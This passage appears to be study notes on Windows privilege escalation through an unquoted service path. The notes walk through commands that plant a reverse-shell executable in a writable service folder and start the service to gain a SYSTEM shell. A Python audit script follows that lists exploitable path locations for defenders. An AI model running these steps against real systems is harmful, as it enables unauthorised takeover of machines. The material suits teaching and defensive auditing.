now for the unquoted service path: we can drop an executable somewhere along that path, and it gets executed once we have permission to start the service

let me show an example

imagine we have this service unquotedsvc

sc qc unquotedsvc

notice that the service path is unquoted and the service runs with SYSTEM privileges

C:\PrivEsc\accesschk.exe /accepteula -uwdq "C:\Program Files\Unquoted Path Service\"

notice that the built-in Users group can read and write to this service's directory

now let’s copy our reverse shell to this path

copy C:\PrivEsc\reverse.exe "C:\Program Files\Unquoted Path Service\Common.exe"

now let’s run the service

net start unquotedsvc

and we got a shell as NT AUTHORITY\SYSTEM
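
an added example, not part of the original notes: a defender-side audit in Python that reads sc qc output and lists every location Windows tries before the real service binary when the path is unquoted, which is why Common.exe was picked up above. the sc qc output and its binary path are constructed for illustration (the screenshot is not available), and the function names are hypothetical.

```python
import re

# Constructed `sc qc` output; the binary path is an assumed example, not taken from the page.
SAMPLE_SC_QC = r"""
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: unquotedsvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\Unquoted Path Service\Common Files\svc.exe
        DISPLAY_NAME       : Unquoted Path Service
        SERVICE_START_NAME : LocalSystem
"""


def binary_path(sc_qc_output):
    """Return the raw BINARY_PATH_NAME value from `sc qc` output, or None."""
    m = re.search(r"^\s*BINARY_PATH_NAME\s*:\s*(.+?)\s*$", sc_qc_output, re.MULTILINE)
    return m.group(1) if m else None


def interception_candidates(path):
    """List the paths Windows tries before the real image, in order.

    Returns [] when the path is quoted or the image path contains no spaces.
    """
    if path is None or path.startswith('"'):
        return []
    # The image path ends at the first ".exe"; anything after it is arguments.
    m = re.match(r"(.+?\.exe)(\s|$)", path, re.IGNORECASE)
    image = m.group(1) if m else path
    # At every space, Windows first tries "<prefix>.exe" before reading further.
    return [image[:i] + ".exe" for i, ch in enumerate(image) if ch == " "]


if __name__ == "__main__":
    for candidate in interception_candidates(binary_path(SAMPLE_SC_QC)):
        print("check ACL on parent folder of:", candidate)
```

every folder that would hold one of the returned paths should be writable by administrators only; quoting the service's binary path removes the ambiguity altogether.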